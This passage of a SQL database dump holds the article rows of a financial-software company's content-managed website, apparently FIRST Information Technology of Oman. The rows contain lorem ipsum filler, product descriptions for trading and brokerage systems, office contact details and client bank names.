ante. <br />Donec sagittis euismod puru. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Praesent vestibulum molestie lacus. Aenean nonummy hendrerit mauris. Phasellus por ta. Fusce c mi. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla dui. Fusce feugiat malesuada odio. Morbi nunc odio, gravida at, cursus nec, luctus a, lorem. Maecenas tristique orci ac sem. Duis ultricies pharetra magna. Donec accumsan malesuada orci.</p>\r\n<p>Donec sit amet eros. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Mauris fermentum dictum magna. Sed laoreet aliquam leo. Ut tellus dolor, dapibus eget, elem entum vel, cursus eleifend, elit. Aenean auctor wisi et urna. Aliquam erat volutpat. Duis ac turpis. Integer rutrum ante eu lacus. Fusce euismod consequat ante.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accumsan nulla vel diam. Sed in lacus ut enim adipis cing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula. Aliquam dapibus tincidunt metus. Praesent justo dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed ante. Donec sagittis euismod purus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. <br />Praesent vestibulum molestie lacus. Aenean nonummy hendrerit mauris. Phasellus porta. Fusce c mi. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla dui. Fusce feugiat malesuada odio. Morbi nunc odio, gravida at, cursus nec, luctus a, lorem. Maecenas tristique orci ac sem. Duis ultricies pharetra magna. <br />Donec accumsan malesuada orci. Donec sit amet eros. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Mauris fermentum dictum magna. Sed laoreet aliquam leo. Ut tellus dolor, dapibus eget, elementum vel, cursus eleifend, elit. Aenean auctor wisi et urna. Aliquam erat volutpat. Duis ac turpis. Integer rutrum ante eu lacus. Fusce euismod consequat ante. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accu msan nulla vel diam. Sed in lacus ut enim adipiscing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula.</p>\r\n<p>Aliquam dapibus tincidunt metus. Praesent justo dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed ante. Donec sagittis euismod purus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Praesent vestibulum molestie lacus. Aenean nonummy hendrerit mauris. Phasellus porta. Fusce c mi. Cum sociis natoque.</p>','',1,11,0,63,'2011-12-20 16:50:14',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-20 16:50:14','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,1,'','',0,12,'robots=\nauthor='),(297,'Terms Of Use','terms-of-use','','Fusce euismod consequat ante. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque sed dolor. Aliquam congue fermentum nisl. Mauris accumsan nulla vel diam. Sed in lacus ut enim adipiscing aliquet. Nulla venenatis. In pede mi, aliquet sit amet, euismod in, auctor ut, ligula. Aliquam dapibus tincidunt metus. Praesent jus to dolor, lobortis quis, lobortis dignissim, pulvinar ac, lorem. Vestibulum sed ante. Donec sagittis euismod purus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Praesent vestibulum molestie lacus. Aenean nonummy hendrerit mauris. Phasellus porta. Fusce c mi.','',1,11,0,63,'2011-12-20 16:59:09',62,'','2011-12-20 16:59:46',62,0,'0000-00-00 00:00:00','2011-12-20 16:59:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,2,'','',0,0,'robots=\nauthor='),(298,'Dficia deserunt mollitia animi idom massa','dficia-deserunt-mollitia-animi-idom-massa','','<p class=\"extra\">Dficia deserunt mollitia animi, id estom Nam libero tempore, cum soluta nobis omnis voluptas assumenda est, omnis doloresed repellendus cemporibautem quibusdam et aut officiis debitis aut rerum <br />necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestinon</p>\r\n<p class=\"extra\"><span><b>mr. Alex Smith</b> (manager)</span></p>\r\n<p><img src=\"templates/fit/images/page1_img6.jpg\" style=\"float: right;\" /></p>','',1,11,0,64,'2011-12-27 09:02:57',62,'','2011-12-27 09:12:39',62,0,'0000-00-00 00:00:00','2011-12-27 09:02:57','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',9,0,1,'','',0,51,'robots=\nauthor='),(299,'REAL-TIME BROKERAGE MANAGEMENT SOLUTION (WASATA)','real-time-brokerage-management-solution-wasata','','<p>Transactions in banking and in financial markets are moving more and more towards direct channels close to the client: call centre, PC via Internet, mobile devices via SMS or Internet. Regardless of the size of the exchange or market conditions, direct channels are becoming more relevant.</p>\r\n<p><b>wasata</b> is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets.</p>','',-2,11,0,65,'2011-12-28 07:58:09',62,'','2011-12-28 07:59:02',62,0,'0000-00-00 00:00:00','2011-12-28 07:58:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,0,'','',0,7,'robots=\nauthor='),(300,'FRONT OFFICE OPERATIONS ON-LINE TRADING SYSTEM (BORSAT)','front-office-operations-on-line-trading-system-borsat','','<p><b>Borsat</b> is next generation trading platform that provides the ultimate e-Trading experience for traders, investor of all levels.</p>\r\n<p><b>Borsat</b> is a powerful trading solution that allows you to work with various brokers and data vendors from a single multifunctional front-end application</p>\r\n<p><b>Borsat </b>offers legendary fast real time straight through processing capabilities that allow trading across multiple markets. Trading services includes a complete order management system (OMS), and FIX connectivity to exchanges, and trade validations. <b>Borsat</b> connects to the back office solutions to offer accounting, wealth management, risk management, portfolio management and other related services.</p>','',-2,11,0,65,'2011-12-28 07:59:05',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 07:59:05','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,7,'robots=\nauthor='),(301,'PORTFOLIO MANAGEMENT SOFTWARE','portfolio-management-software-','','<p>Portfolio management software will account for your client’s investment portfolios and give him a statement of all of his investment holdings or just the investment portfolio(s) you are managing. These systems incorporate varying features and as a result, each program may appeal to differing investment practices. Typical portfolio systems can be updated daily via Broker/Dealer and Mutual Fund downloads, pricing services via internet or manually entered.</p>','',-2,11,0,65,'2011-12-28 07:59:40',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 07:59:40','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,7,'robots=\nauthor='),(302,'RESEARCH MANAGEMENT SYSTEM','research-management-system-','','<p><b>RESARCHER</b> is an investment record keeping; companies records updated with the research information according to balance sheet and profit and loss, this module will generate most of the ratios required by brokers, portfolio managers and investors.</p>','',-2,11,0,65,'2011-12-28 08:00:15',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 08:00:15','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,2,'robots=\nauthor='),(303,'MULTI-MARKETS','multi-markets-','','<p>The Solution provides enterprise-class power and functionality allowing you to support Multi-Markets in one screen and FIX 4.2 and FIX4.4 (<b>should be defined</b>), also it will give you the ability to make direct connection to Stock Exchanges trading platform.</p>','',-2,11,0,65,'2011-12-28 08:02:29',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 08:02:29','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,3,'robots=\nauthor='),(304,'BANKING GATEWAYS (ON-LINE AND OFF-LINE)','banking-gateways-on-line-and-off-line','','<p>The banking gateway system will give clients the ability to deposit money into the brokerage banking account in the bank it reflects online into their brokerage system records and vice versa. In addition, the clients can issue a transfer on-line from their brokerage accounts to their banking accounts.</p>','',-2,11,0,65,'2011-12-28 08:03:05',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 08:03:05','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,4,'robots=\nauthor='),(305,'FIX 4.2 SELL INTERFACE','fix-42-sell-interface','','<p>This interface will allow the investment company to have the ability to receive orders from other brokerage companies, financial institutions and other parties who have systems compatible with FIX 4.2. (<b>should be defined</b>)</p>\r\n<p>This interface includes two parts:</p>\r\n<ul>\r\n<li>The ability to receive orders from another company .</li>\r\n<li>Web Services to give the required information about the orders entered by clients, portfolio information, transactions processed and authentication.</li>\r\n</ul>','',-2,11,0,65,'2011-12-28 08:03:37',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 08:03:37','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,9,'robots=\nauthor='),(306,'ISLAMIC TRADING','islamic-trading','','<p>The investment company can control the trading on Islamic/non Islamic companies according to Sharia compliance.</p>','',-2,11,0,65,'2011-12-28 08:03:57',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 08:03:57','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,7,'robots=\nauthor='),(307,'FULL STOCK EXCHNAGE SOLUTION','full-stock-exchnage-solution','','<p>Write here</p>','',-2,11,0,66,'2011-12-28 13:19:14',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:19:14','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,3,'robots=\nauthor='),(308,'ERP BROKARAGE WEALTH MANAGEMENT SOLUTION','erp-brokarage-wealth-management-solution','','<p>Write here</p>','',-2,11,0,66,'2011-12-28 13:19:33',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:19:33','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,1,'robots=\nauthor='),(309,'FUND MANAGEMENT SYSTEM','fund-management-system','','<p>It helps investors track and analyze their stocks, mutual funds, and other investments with a wide variety of easy to use graphs and reports. Fund Manager makes keeping track of your investments easy by updating prices and retrieving your transactions from the Internet with the push of a button.</p>\r\n<p>The Solution provides enterprise-class power and functionality allowing you to support your operations within a single, fully integrated system. Additionally, FUND advanced open architecture allows for tight integration with any of your existing or third party systems. And, FUND is continually updated with new features and functionality in order to meet the ever changing demands of the alternative asset community.</p>','',-2,11,0,66,'2011-12-28 13:19:52',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:19:52','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,2,'robots=\nauthor='),(310,'ASSET MANAGEMENT SOLUTION','asset-management-solution','','<p>Asset Management Solution Comprehensive Functionality Addressing Key Mission-Critical Business Needs with many modules like Multi-Currency, Multi- Exchange, Multi-Fund, Complete Share holder information, Subscription & Redemption …etc.</p>','',-2,11,0,66,'2011-12-28 13:21:00',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:21:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,0,'robots=\nauthor='),(311,'INITIAL PUBLIC OFFERING SOLUTION','initial-public-offering-solution-','','<p>With robust capital markets and over 100 regional Initial Public Offerings planned for the next few years there is an opportunity to provide software solutions to streamline the IPO process. The IPO process in the region is currently handled on a legacy basis and there are significant inefficiencies in the process.</p>\r\n<p>One of the key issues with developing an IPO Manager is that it has to be customized for each IPO coming to market. The product must be adaptable to the variables of each offering coming to market.</p>\r\n<p><b>IPO Manager</b> will be based on a robust, stable and flexible engine that will be the core of the application, developed in Java (J2EE standard compliant), and based on Browser interface to the end-user. </p>\r\n<p><b>IPO Manager</b> will be dedicated to the support of the activity of IPO Lead Manager, according to the regulations in place in the most advanced European, GCC and US stock markets.</p>','',-2,11,0,66,'2011-12-28 13:21:17',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:21:17','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,0,'robots=\nauthor='),(312,'SOLUTIONS FOR STOCK EXCHANGES','solutions-for-stock-exchanges','','<p>With our comprehensive solution you will cover all important aspects of exchange needs with high quality and professional functionality, the solution has many modules like Electronic Trading, Central Registration Depository, Clearing & Settlement, Surveillance & Market Control …etc.</p>','',-2,11,0,66,'2011-12-28 13:21:45',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:21:45','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,2,'robots=\nauthor='),(313,'FINANCIAL PORTAL SOLUTIONS','financial-portal-solutions','','<p>Write here</p>','',-2,11,0,66,'2011-12-28 13:22:13',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:22:13','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,1,'robots=\nauthor='),(314,'ERP AND HR SOLUTIONS','erp-and-hr-solutions','','<p>Write here</p>','',-2,11,0,66,'2011-12-28 13:22:24',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:22:24','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,6,'robots=\nauthor='),(315,'PROFESSIONAL SERVICES','professional-services','','<p>Our professional service staff helps customers to implement their projects in a highly efficient and effective way to ensure that our cost effective solution meets their business and technological requirements and goals. FIT professional services include:</p>\r\n<ul>\r\n<li>IT Strategies & Plans</li>\r\n<li>Operations Policies & Procedures</li>\r\n<li>Business Requirement Definition</li>\r\n<li>Solution Architecture Design </li>\r\n<li>Application Development </li>\r\n<li>System Integration</li>\r\n<li>Installation & deployment</li>\r\n<li>Testing & QA</li>\r\n<li>Training</li>\r\n<li>Technical Support</li>\r\n<li>Maintenance</li>\r\n</ul>\r\n<p> </p>\r\n<p>In addition, FIT provides its customers with expertise in the following sectors:</p>\r\n<ul>\r\n<li>Consultancy – Supporting its customers in the design phase, keeping in consideration every aspect of the system: technical, functional, and architectural;</li>\r\n<li>Design and Development – Through its specialized workgroups, the company can develop any type of complete solution, built on the assets of knowledge and experiences;</li>\r\n<li>Systems Support and Maintenance – Delivered to the customers for any type of requirement relevant to software, application management and data-stream. </li>\r\n</ul>','',-2,11,0,66,'2011-12-28 13:22:37',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-12-28 13:22:37','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,0,'','',0,2,'robots=\nauthor='),(316,'Head Office','head-office','','<p>FIRST Information Technology (FIT)</p>\r\n<p>Muscat – Sultanate of Oman<br /> Tel.: +968 24 700 454<br /> Fax: +968 24 780 500</p>\r\nPO Box 629, Ruwi, Postal Code 112, Sultanate of Oman.<strong><br /> </strong>E-Mail: <a href=\"mailto:info@FITOMAN.com\">info@fitoman.com</a> <br /> <br />','',1,11,0,68,'2011-12-28 13:38:49',62,'','2011-12-28 13:43:30',62,0,'0000-00-00 00:00:00','2011-12-28 13:38:49','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,1,'','',0,1,'robots=\nauthor='),(317,'UAE Office','uae-office','','<p>FIRST Information Technology (FIT)</p>\r\n<p>Dubai - UAE<br /> Tel.: +97150 748 3851<br /> Tel.: +97143055555</p>\r\n<p>PO Box 120804, Dubai – UAE<br /> E-Mail: <a href=\"mailto:info@FITOMAN.com\">info@fitoman.com</a><strong></strong></p>','',1,11,0,68,'2011-12-28 13:43:45',62,'','2011-12-28 13:53:31',62,0,'0000-00-00 00:00:00','2011-12-28 13:43:45','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,2,'','',0,1,'robots=\nauthor='),(318,'Amman Office','amman-office','','<p>FIRST Information Technology (FIT)</p>\r\n<p>Amman – Jordan<br /> Tel.: +962-6-5523399<br /> Fax: +962-6-5545615</p>\r\n<p>PO Box 960345 Amman, 11196 Jordan<br />E-Mail: <a href=\"mailto:info@FITOMAN.com\">info@fitoman.com</a><strong></strong></p>','',1,11,0,68,'2011-12-28 13:46:08',62,'','2011-12-28 13:53:22',62,0,'0000-00-00 00:00:00','2011-12-28 13:46:08','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',4,0,3,'','',0,1,'robots=\nauthor='),(319,'Qatar Office','qatar-office','','<p>FIRST Information Technology (FIT)</p>\r\n<p>Doha– Qatar<br />Tel.: +97466418868</p>\r\n<p><br />E-Mail: <a href=\"mailto:info@FITOMAN.com\">info@fitoman.com</a></p>','',1,11,0,68,'2011-12-28 13:53:43',62,'','2011-12-28 13:55:56',62,0,'0000-00-00 00:00:00','2011-12-28 13:53:43','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',5,0,4,'','',0,0,'robots=\nauthor='),(351,'Electronic Trading','electronic-trading','',' ','',1,11,0,66,'2012-03-21 15:48:09',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:48:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,1,'','',0,11,'robots=\nauthor='),(335,'Real-time Brokerage Management Solution (wasata)','real-time-brokerage-management-solution-wasata','','<p><b>wasata</b> is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets.</p>\r\n<p><b>wasata</b> is a set of modules developed to manage, in an integrated mode, the functionalities required for the administration of securities, asset management, order collections and distribution of financial products.</p>\r\n<ul>\r\n<li>Full Accounting System</li>\r\n<li>Market processors</li>\r\n<li>Financial Risk Management System</li>\r\n<li>Customer Relationship Management</li>\r\n</ul>\r\n<p><br /> <b>wasata</b> has the following characteristics:</p>\r\n<ul>\r\n<li>Multi-channel;</li>\r\n<li>Multi-market;</li>\r\n<li>Multi-information provider;</li>\r\n<li>Multi-currency;</li>\r\n<li>Multi-lingual;</li>\r\n</ul>','',1,11,0,65,'2012-03-21 14:17:51',62,'','2012-03-21 14:28:30',62,0,'0000-00-00 00:00:00','2012-03-21 14:17:51','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',4,0,1,'','',0,24,'robots=\nauthor='),(320,'msm','msm','','<ol start=\"1\">\r\n<li><st1:place><st1:city>Muscat</st1:city></st1:place> Securities Market</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:40:39',62,'','2012-03-21 13:44:14',62,0,'0000-00-00 00:00:00','2012-03-21 12:40:39','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,18,'','',0,0,'robots=\nauthor='),(325,'adcb','adcb','','<ol start=\"1\">\r\n<li>Abu Dhabi Commercial Bank</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:45:05',62,'','2012-03-21 13:43:43',62,0,'0000-00-00 00:00:00','2012-03-21 12:45:05','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,13,'','',0,0,'robots=\nauthor='),(326,'cbd','cbd','','<ol start=\"1\">\r\n<li>Commercial Bank of Dubai</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:45:36',62,'','2012-03-21 13:43:37',62,0,'0000-00-00 00:00:00','2012-03-21 12:45:36','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,12,'','',0,0,'robots=\nauthor='),(327,'ars','ars','','<ol start=\"1\">\r\n<li>Al Ramz Securities</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:45:50',62,'','2012-03-21 13:43:29',62,0,'0000-00-00 00:00:00','2012-03-21 12:45:50','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,11,'','',0,0,'robots=\nauthor='),(328,'ds','ds','','<ol start=\"1\">\r\n<li>Daman Securities</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:46:21',62,'','2012-03-21 13:43:23',62,0,'0000-00-00 00:00:00','2012-03-21 12:46:21','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,10,'','',0,0,'robots=\nauthor='),(329,'ai','ai','','<ol start=\"1\">\r\n<li>Awraq Islamic</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:46:55',62,'','2012-03-21 13:43:15',62,0,'0000-00-00 00:00:00','2012-03-21 12:46:55','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,9,'','',0,0,'robots=\nauthor='),(330,'ajfs','ajfs','','<ol start=\"1\">\r\n<li>Al Jazeera Financial Service</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:47:09',62,'','2012-03-21 13:43:08',62,0,'0000-00-00 00:00:00','2012-03-21 12:47:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,8,'','',0,0,'robots=\nauthor='),(331,'bhs','bhs','','<ol start=\"1\">\r\n<li>Brokerage House Securities</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:47:35',62,'','2012-03-21 13:43:01',62,0,'0000-00-00 00:00:00','2012-03-21 12:47:35','0000-00-00 